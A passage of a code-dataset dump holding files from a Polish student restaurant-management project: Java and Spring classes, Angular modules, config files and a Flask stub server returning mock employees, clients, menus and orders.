0.64462810754776, "alphanum_fraction": 0.64462810754776, "avg_line_length": 20, "blob_id": "fed472798668ba2466b03a8b73378f52b30089cd", "content_id": "ee5a116990cedc0dd5109d90459398395ec88c4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 484, "license_type": "no_license", "max_line_length": 79, "num_lines": 22, "path": "/platnosci/platnosci/src/main/java/platnosci/Entity/PaymentAbstract.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage platnosci.Entity;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic abstract class PaymentAbstract {\r\n \r\n final String url;\r\n \r\n public PaymentAbstract(final String url){\r\n this.url = url;\r\n }\r\n \r\n public abstract String pay(final PaymentForm paymentForm);\r\n \r\n}\r\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 30, "blob_id": "2fea0bdeffb432e53aa71f2ca2653cb36ccf4faf", "content_id": "e3b1c9073103aff8fbcff50a362ea2246e3b29e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 32, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/platnosci/platnosci/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'platnosci'\r\n" }, { "alpha_fraction": 0.5398633480072021, "alphanum_fraction": 0.5489749312400818, "avg_line_length": 25.873016357421875, "blob_id": "2861d69229591e39cbb33243247bec32f2063360", "content_id": "632c362e7d64d1ab7d17e9fa4824e2a5a90e32a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1756, "license_type": "no_license", "max_line_length": 94, "num_lines": 63, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Entity/EmployeeOfferForm.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class EmployeeOfferForm {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeOfferForm.class);\r\n \r\n private boolean valid;\r\n\r\n public boolean isValid() {\r\n return valid;\r\n }\r\n\r\n private String id_restauracji;\r\n private String stanowisko;\r\n private String etat;\r\n private String telefon;\r\n\r\n public String getId_restauracji() {\r\n return id_restauracji;\r\n }\r\n\r\n public String getStanowisko() {\r\n return stanowisko;\r\n }\r\n\r\n public String getEtat() {\r\n return etat;\r\n }\r\n\r\n public String getTelefon() {\r\n return telefon;\r\n }\r\n\r\n public void validate(){\r\n if(!validateTelephone()){\r\n valid = false;\r\n return;\r\n }\r\n valid = true;\r\n }\r\n \r\n private boolean validateTelephone(){\r\n if(!telefon.matches(\"[\\\\d+ ]+\")){\r\n log.info(\"Telephone number {} has illegal signs\", telefon);\r\n return false; \r\n }\r\n String tmpPhone = telefon;\r\n tmpPhone = tmpPhone.replaceAll(\" \", \"\");\r\n if(tmpPhone.codePointAt(0) == '+' && tmpPhone.length() != 12){\r\n log.info(\"Telephone number with plus sign, {}, does not have 9 signs\", telefon);\r\n return false; \r\n }\r\n Integer amountOfNumbers = tmpPhone.replaceAll(\"\\\\D\", \"\").length();\r\n if(amountOfNumbers != 9 && amountOfNumbers != 11 && amountOfNumbers != 13){\r\n log.info(\"Telephone number , {}, has a different size than 9, 11 or 13\", telefon);\r\n return false; \r\n }\r\n return true;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6012705564498901, "alphanum_fraction": 0.6020179390907288, "avg_line_length": 30.240962982177734, "blob_id": "5c8b33c9d812ff209e74b3010ad635600dc702f4", "content_id": "0f60dbd4b819dedcad68f8ac44e7c8f07ed336b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2676, "license_type": "no_license", "max_line_length": 87, "num_lines": 83, "path": "/zarzadzanie_siecia/src/main/java/zarzadzanie_siecia/Controller/NetworkController.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_siecia.Controller;\r\n\r\nimport zarzadzanie_siecia.Entity.RestaurantCreator;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.core.env.Environment;\r\nimport org.springframework.web.bind.annotation.CrossOrigin;\r\nimport org.springframework.web.bind.annotation.GetMapping;\r\nimport org.springframework.web.bind.annotation.RestController;\r\nimport org.springframework.web.bind.annotation.PostMapping;\r\nimport org.springframework.web.bind.annotation.RequestBody;\r\n\r\n@RestController\r\npublic class NetworkController {\r\n \r\n @Autowired\r\n private Environment env;\r\n \r\n private static final Logger log = LoggerFactory.getLogger(NetworkController.class);\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/dodaj_restauracje\")\r\n public String addRestaurant(\r\n @RequestBody String restaurantForm) \r\n {\r\n try{\r\n log.info(\"Adding restaurant {}\", restaurantForm);\r\n return (new RestaurantCreator()).createRestaurant(\r\n restaurantForm, \r\n env.getProperty(\"createRestaurantAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n } \r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_restauracje\")\r\n public String getRestaurant() \r\n {\r\n try{\r\n log.info(\"Fetching restaurants\");\r\n return (new RestaurantCreator()).getRestaurant( \r\n env.getProperty(\"getRestaurantAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n } \r\n \r\n @CrossOrigin\r\n @PostMapping(\"/przydziel_menadzera\")\r\n public String assignManager(\r\n @RequestBody String assignManagerForm) \r\n {\r\n try{\r\n log.info(\"Assigning manager {}\", assignManagerForm);\r\n return (new RestaurantCreator()).assignManager(\r\n assignManagerForm,\r\n env.getProperty(\"assignManagerAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/usun_restauracje\")\r\n public String removeRestaurant(\r\n @RequestBody String restaurantIdForm) \r\n {\r\n try{\r\n log.info(\"Removing restaurant {}\", restaurantIdForm);\r\n return (new RestaurantCreator()).removeRestaurant(\r\n restaurantIdForm,\r\n env.getProperty(\"removeRestaurantAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7176470756530762, "avg_line_length": 32.871795654296875, "blob_id": "c7a752e858bcbd284561db42ca3da88d58e08835", "content_id": "d3a534db54bb51b76f9ed07b4a6aee26122c8365", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1360, "license_type": "no_license", "max_line_length": 97, "num_lines": 39, "path": "/ui-menadzera-restauracji/src/app/app.module.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { BrowserModule } from '@angular/platform-browser';\r\nimport { NgModule } from '@angular/core';\r\nimport { FormsModule } from '@angular/forms';\r\nimport { HttpClientModule } from '@angular/common/http';\r\nimport { HttpModule } from '@angular/http';\r\nimport { AppComponent } from './app.component';\r\nimport { RouterModule, Routes } from '@angular/router';\r\n//Service Imports\r\nimport { DataService } from './services/data.service';\r\nimport { AddEmployeeComponent } from './components/add-employee/add-employee.component';\r\nimport { NavbarComponent } from './components/navbar/navbar.component';\r\nimport { AddRecruitmentComponent } from './components/add-recruitment/add-recruitment.component';\r\nimport { HomepageComponent } from './components/homepage/homepage.component';\r\n\r\nconst appRoutes: Routes = [\r\n {path:'', component:HomepageComponent},\r\n {path:'add_employee', component:AddEmployeeComponent},\r\n {path:'add_recruitment', component:AddRecruitmentComponent}\r\n];\r\n\r\n@NgModule({\r\n declarations: [\r\n AppComponent,\r\n AddEmployeeComponent,\r\n NavbarComponent,\r\n AddRecruitmentComponent,\r\n HomepageComponent\r\n ],\r\n imports: [\r\n BrowserModule,\r\n HttpClientModule,\r\n FormsModule,\r\n HttpModule,\r\n RouterModule.forRoot(appRoutes)\r\n ],\r\n providers: [DataService],\r\n bootstrap: [AppComponent]\r\n})\r\nexport class AppModule { }\r\n" }, { "alpha_fraction": 0.782608687877655, "alphanum_fraction": 0.782608687877655, "avg_line_length": 44, "blob_id": "034bc4348dad001c9de2df1baedd735e721d7fae", "content_id": "3ec6e092b28e0aaff0815040780d9b0f8f9a33d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 46, "license_type": "no_license", "max_line_length": 44, "num_lines": 1, "path": "/baza_zarzadzanie_siecia/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'baza_zarzadzanie_siecia'\r\n" }, { "alpha_fraction": 0.7804877758026123, "alphanum_fraction": 0.7804877758026123, "avg_line_length": 39, "blob_id": "d5e08be13ec3d6ac89b5439df5f45d12994ea80b", "content_id": "97ddfe5f7be9379908cb035568e25d7cf760a13e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 41, "license_type": "no_license", "max_line_length": 39, "num_lines": 1, "path": "/zarzadzanie_siecia/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'zarzadzanie_siecia'\r\n" }, { "alpha_fraction": 0.6059225797653198, "alphanum_fraction": 0.6116173267364502, "avg_line_length": 20.512821197509766, "blob_id": "f0d8b9b832f5a74c93087ec21f6d9a316f3d7690", "content_id": "b3faae7b1df88cf8be1c2bb84e67c01d70f5a9c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 880, "license_type": "no_license", "max_line_length": 54, "num_lines": 39, "path": "/payment/src/app/app.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component } from '@angular/core';\r\nimport { Payment } from './models/payment';\r\nimport { DataService } from './services/data.service';\r\nimport { Observable } from 'rxjs';\r\nimport { interval } from 'rxjs';\r\nimport { } from 'rxjs';\r\n\r\n@Component({\r\n selector: 'app-root',\r\n templateUrl: './app.component.html',\r\n styleUrls: ['./app.component.css']\r\n})\r\nexport class AppComponent {\r\n title = 'payment';\r\n payment: Payment = new Payment();\r\n paymentOptions: any = [\r\n 'BLIK',\r\n 'CARD',\r\n 'PRZELEW'\r\n ];\r\n status: string;\r\n\r\n constructor(public dataService: DataService) { }\r\n\r\n ngOnInit() { \r\n interval(10000)\r\n .subscribe(res => {\r\n this.dataService.getStatus();\r\n });\r\n }\r\n\r\n onSubmit() {\r\n this.dataService.pay(this.payment);\r\n }\r\n\r\n radioChangeHandler(event: any) {\r\n this.payment.sposób_zapłaty = event.target.value;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7761732935905457, "alphanum_fraction": 0.8483754396438599, "avg_line_length": 44.16666793823242, "blob_id": "6ca756100181a23a761dfd43eebb1de8458b158c", "content_id": "2b0511ae7dc70b9477f5b5c05928fb6acdd3aa4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 277, "license_type": "no_license", "max_line_length": 63, "num_lines": 6, "path": "/zarzadzanie_siecia/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9094\r\n\r\ncreateRestaurantAddress=http://localhost:9095/dodaj_restauracje\r\ngetRestaurantAddress=http://localhost:9095/pobierz_restauracje\r\nassignManagerAddress=http://localhost:9095/przydziel_menadzera\r\nremoveRestaurantAddress=http://localhost:9095/usun_restauracje\r\n" }, { "alpha_fraction": 0.7469879388809204, "alphanum_fraction": 0.8433734774589539, "avg_line_length": 26.33333396911621, "blob_id": "15696942120bf9d861ae382cd4ee72bb05a20b9a", "content_id": "c0ae2b096ac97398d94f48a87fc05f3b7dba221b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 83, "license_type": "no_license", "max_line_length": 63, "num_lines": 3, "path": "/baza_zarzadzanie_siecia/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9095\r\n\r\ncreateRestaurantAddress=http://localhost:5000/dodaj_restauracje" }, { "alpha_fraction": 0.49597790837287903, "alphanum_fraction": 0.5133603811264038, "avg_line_length": 28.56773567199707, "blob_id": "c0e7b055011452c8d8abfae71aea44b4489c30f0", "content_id": "74da9f6d4b2dcd8f0431407ebd0a2a0a32800485", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28608, "license_type": "no_license", "max_line_length": 143, "num_lines": 967, "path": "/zaslepki_baz_danych/ZASLEPKA.py", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\nimport datetime\n\napp = Flask(__name__)\n\n\[email protected]('/')\ndef main_site():\n return 404\n\n\n# Pobierz_pracownika(id_pracownika: string) zwraca string:login, string:hasło oraz string:stanowisko\[email protected]('/pobierz_pracownika', methods=['GET'])\ndef pobierz_pracownika():\n try:\n if request.args.get(\"id_pracownika\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_pracownika = str(request.args.get(\"id_pracownika\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n employee_list = {\n 'lista': [\n {\n 'login': 'jusepe',\n 'hasło': 'wodjfoph35vg',\n 'stanowisko': 'Pracownik kuchni'\n\n },\n {\n 'login': 'jadeSzybko12',\n 'hasło': 'epivrugoi',\n 'stanowisko': 'Dostawca'\n },\n {\n 'login': 'hania_87',\n 'hasło': 'wr98cyeui',\n 'stanowisko': 'Sprzątaczka'\n }\n ]\n }\n for pracownik in employee_list['lista']:\n if pracownik['login'] == id_pracownika:\n return jsonify(pracownik)\n\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\n# Pobierz_klienta(id_klienta:string) zwraca string:login, string:hasło\[email protected]('/pobierz_klienta', methods=['GET'])\ndef pobierz_klienta():\n try:\n if request.args.get(\"id_klienta\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_klienta = str(request.args.get(\"id_klienta\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n client_list = {\n 'lista': [\n {\n 'login': 'hydroMen',\n 'hasło': 'sdhvgo'\n\n },\n {\n 'login': 'Grunwald44',\n 'hasło': 'spwwocihpf'\n },\n {\n 'login': 'rysio99',\n 'hasło': 'tesy54pipoyr'\n }\n ]\n }\n for klient in client_list['lista']:\n if klient['login'] == id_klienta:\n return jsonify(klient)\n\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\nnetwork_menu = {\n 'lista': [\n {\n 'id_dania': 1,\n 'nazwa': 'Ciastko',\n 'cena': 29.99,\n 'opis': 'Pycha ciacho'\n\n },\n {\n 'id_dania': 2,\n 'nazwa': 'Kawa',\n 'cena': 5.99,\n 'opis': 'Dobra kawusia'\n }\n ]\n}\n\nrestaurant_menu_1 = {\n 'lista': [\n {\n 'id_dania': 1,\n 'nazwa': 'Ciastko',\n 'cena': 29.99,\n 'opis': 'Pycha ciacho'\n\n },\n {\n 'id_dania': 2,\n 'nazwa': 'Kawa',\n 'cena': 5.99,\n 'opis': 'Dobra kawusia'\n },\n {\n 'id_dania': 3,\n 'nazwa': 'Bułka',\n 'cena': 2.99,\n 'opis': 'Duża buła'\n }\n ]\n}\n\nrestaurant_menu_2 = {\n 'lista': [\n {\n 'id_dania': 1,\n 'nazwa': 'Ciastko',\n 'cena': 29.99,\n 'opis': 'Pycha ciacho'\n\n },\n {\n 'id_dania': 2,\n 'nazwa': 'Kawa',\n 'cena': 5.99,\n 'opis': 'Dobra kawusia'\n },\n {\n 'id_dania': 4,\n 'nazwa': 'Chleb',\n 'cena': 0.99,\n 'opis': 'Dobry chlebek'\n }\n ]\n}\n\nid_dania_iterator = 4\n\n\[email protected]('/pobierz_menu_restauracji', methods=['GET'])\ndef pobierz_menu_restauracji():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n if id_restauracji == 0:\n return jsonify(network_menu)\n elif id_restauracji == 1:\n return jsonify(restaurant_menu_1)\n elif id_restauracji == 2:\n return jsonify(restaurant_menu_2)\n else:\n resp = jsonify('nie ma takiej restuaracji')\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\n# Pobierz_restauracje(miasto:string) zwraca (lista[id_restauracji:int, nazwa:string, adres:string])\[email protected]('/pobierz_restauracje_z_miasta', methods=['GET'])\ndef pobierz_resturacje_z_miasta():\n restaurant_list = {\n 'lista': [\n {\n 'id_restauracji': 1,\n 'nazwa': 'Don Keke',\n 'adres': 'Liliowa 12'\n\n },\n {\n 'id_restauracji': 2,\n 'nazwa': 'Bambino',\n 'adres': 'Arnolda 4'\n },\n {\n 'id_restauracji': 3,\n 'nazwa': 'Que pasa',\n 'adres': 'Grunwaldzka 13'\n }\n ]\n }\n try:\n if request.args.get(\"miasto\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n miasto = str(request.args.get(\"miasto\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(restaurant_list)\n\n\n# Pobierz_miasta() zwraca (lista[miasto:string])\[email protected]('/pobierz_miasta', methods=['GET'])\ndef pobierz_miasta():\n cities_list = {\n 'lista': [\n {\n 'nazwa': 'Warszawa'\n },\n {\n 'nazwa': 'Radom'\n },\n {\n 'nazwa': 'Torun'\n }\n ]\n }\n return jsonify(cities_list)\n\n\n# Dodaj_danie(id_restauracji:int, nazwa:string,cena:double,opis:string)\[email protected]('/dodaj_danie', methods=['POST'])\ndef dodaj_danie():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_restauracji\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = rrequest[\"id_restauracji\"]\n if rrequest[\"nazwa\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n nazwa = rrequest[\"nazwa\"]\n if rrequest[\"opis\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n opis = rrequest[\"opis\"]\n if rrequest[\"cena\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n cena = rrequest[\"cena\"]\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n global id_dania_iterator\n id_dania_iterator += 1\n if id_restauracji == 1:\n restaurant_menu_1['lista'].append({\n 'id_dania': id_dania_iterator,\n 'nazwa': nazwa,\n 'cena': cena,\n 'opis': opis\n\n })\n print(restaurant_menu_1)\n elif id_restauracji == 2:\n restaurant_menu_2['lista'].append({\n 'id_dania': id_dania_iterator,\n 'nazwa': nazwa,\n 'cena': cena,\n 'opis': opis\n\n })\n print(restaurant_menu_2)\n elif id_restauracji == 0:\n network_menu['lista'].append({\n 'id_dania': id_dania_iterator,\n 'nazwa': nazwa,\n 'cena': cena,\n 'opis': opis\n\n })\n print(network_menu)\n else:\n resp = jsonify('nie ma takiej restuaracji')\n resp.status_code = 404\n return resp\n\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Usun_danie(id_dania:int, id_restauracji:int) <- usuwa danie z oferty sieci lub restauracji\[email protected]('/usun_danie', methods=['GET'])\ndef usun_danie():\n try:\n if request.args.get(\"id_dania\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_dania = int(request.args.get(\"id_dania\"))\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n\n k = 0\n if id_restauracji == 0:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n network_menu['lista'].pop(k)\n k += 1\n k = 0\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_1['lista'].pop(k)\n k += 1\n k = 0\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_2['lista'].pop(k)\n k += 1\n elif id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_1['lista'].pop(k)\n k += 1\n else:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n restaurant_menu_2['lista'].pop(k)\n k += 1\n print(network_menu)\n print(restaurant_menu_1)\n print(restaurant_menu_2)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Modyfikuj_danie(id_dania:int, id_restauracji:int, nazwa:string, cena:double, opis:string)\[email protected]('/modyfikuj_danie', methods=['POST'])\ndef modyfikuj_danie():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_restauracji\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n if id_restauracji != 1 and id_restauracji != 2:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n try:\n if rrequest[\"id_dania\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_dania = int(rrequest['id_dania'])\n try:\n if rrequest[\"nazwa\"]:\n if id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n danie['nazwa'] = str(rrequest['nazwa'])\n elif id_restauracji == 2:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n danie['nazwa'] = str(rrequest['nazwa'])\n else:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n danie['nazwa'] = str(rrequest['nazwa'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"cena\"]:\n if id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n danie['cena'] = int(rrequest['cena'])\n elif id_restauracji == 2:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n danie['cena'] = int(rrequest['cena'])\n else:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n danie['cena'] = int(rrequest['cena'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"opis\"]:\n if id_restauracji == 1:\n for danie in restaurant_menu_1['lista']:\n if danie['id_dania'] == id_dania:\n danie['opis'] = str(rrequest['opis'])\n elif id_restauracji == 2:\n for danie in restaurant_menu_2['lista']:\n if danie['id_dania'] == id_dania:\n danie['opis'] = str(rrequest['opis'])\n else:\n for danie in network_menu['lista']:\n if danie['id_dania'] == id_dania:\n danie['opis'] = str(rrequest['opis'])\n except KeyError:\n pass\n\n print(network_menu)\n print(restaurant_menu_1)\n print(restaurant_menu_2)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\nlista_zamowien_R = {\n 'lista_zamowien': [\n {\n 'id_zamowienia': 1,\n 'id_restauracji': 1,\n 'kwota': 23.99,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'status': 'oczekujace',\n 'kontakt': {'imie': 'Jan', 'nazwisko': 'Kowalski', 'telefon': '123456789', 'adres': 'Konwaliowa 3'}\n },\n {\n 'id_zamowienia': 2,\n 'id_restauracji': 2,\n 'kwota': 25.77,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'status': 'przygotowywane',\n 'kontakt': {'imie': 'Adam', 'nazwisko': 'Wypadam', 'telefon': '123456789', 'adres': 'Wysoka 3'}\n\n },\n {\n 'id_zamowienia': 3,\n 'id_restauracji': 3,\n 'kwota': 30.57,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'status': 'w_drodze',\n 'kontakt': {'imie': 'Andrzej', 'nazwisko': 'Adrianowski', 'telefon': '123456789', 'adres': 'Cicha 3'}\n }\n ]\n}\n\n\[email protected]('/zmien_status_zamowienia', methods=['POST'])\ndef zmien_status_zamowienia():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(rrequest['id_zamowienia'])\n if rrequest['status'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n status = str(rrequest['status'])\n for zamowienie in lista_zamowien_R['lista_zamowien']:\n if zamowienie['id_zamowienia'] == id_zamowienia:\n zamowienie['status'] = str(status)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\[email protected]('/pobierz_zamowienia', methods=['GET'])\ndef pobierz_zamowienia():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien_R)\n\n\nlista_zamowien = {\n 'lista_zamowien': [\n {\n 'id_zamowienia': 1,\n 'id_klienta': 1,\n 'id_restauracji': 1,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 26.88,\n 'status': 'oczekujace',\n 'data_zlozenia': '2018-09-10',\n 'ocena': '2/10',\n 'adres': \"Grunwaldzka 13\"\n },\n {\n 'id_zamowienia': 2,\n 'id_klienta': 2,\n 'id_restauracji': 3,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 59.88,\n 'status': 'przygotowywane',\n 'data_zlozenia': '2018-06-11',\n 'ocena': '4/10',\n 'adres': \"Wolności 15\"\n\n },\n {\n 'id_zamowienia': 3,\n 'id_klienta': 1,\n 'id_restauracji': 5,\n 'lista_dan': [\n {'id_dania': 1, 'nazwa': 'Kawa'},\n {'id_dania': 2, 'nazwa': 'Ciastko'},\n {'id_dania': 3, 'nazwa': 'Bulka'}\n ],\n 'kwota': 43.80,\n 'status': 'w_drodze',\n 'data_zlozenia': '2018-12-16',\n 'ocena': '8/10',\n 'adres': \"Alternatywy 4\"\n\n }\n ]\n}\nzamowienia_interator = 4\n\n\[email protected]('/dodaj_zamowienie_Z', methods=['POST'])\ndef dodaj_zamowienie_Z():\n try:\n rrequest = request.get_json()\n if rrequest['id_klienta'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_klienta = int(rrequest['id_klienta'])\n\n if rrequest['id_restauracji'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n\n if rrequest['lista_dan'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n lista_dan = rrequest['lista_dan']\n\n if rrequest['kwota'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n kwota = float(rrequest['kwota'])\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n global zamowienia_interator\n zamowienia_interator += 1\n lista_zamowien['lista_zamowien'].append({\n 'id_zamowienia': zamowienia_interator,\n 'lista_dan': lista_dan,\n 'id_restauracji': id_restauracji,\n 'id_klienta': id_klienta,\n 'kwota': kwota,\n 'status': 'oczekujące',\n 'data_zlozenia': str(datetime.datetime.today().strftime('%Y-%m-%d'))\n })\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Edytuj_zamowienie(id_zamowienia:int, lista[id_dania:int,nazwa:string],kwota:double)\[email protected]('/edytuj_zamowienie_Z', methods=['POST'])\ndef edytuj_zamowienie_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n try:\n if rrequest[\"lista_dan\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['lista_dan'] = str(rrequest['lista_dan'])\n except KeyError:\n pass\n\n try:\n if rrequest[\"kwota\"]:\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == int(rrequest['id_zamowienia']):\n zamowienie['cena'] = int(rrequest['cena'])\n except KeyError:\n pass\n\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Zmien_status_zamowienia(id_zamowienia:int, status:string)\[email protected]('/zmien_status_zamowienia_Z', methods=['POST'])\ndef zmien_status_zamowienia_Z():\n rrequest = request.get_json()\n try:\n if rrequest[\"id_zamowienia\"] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = 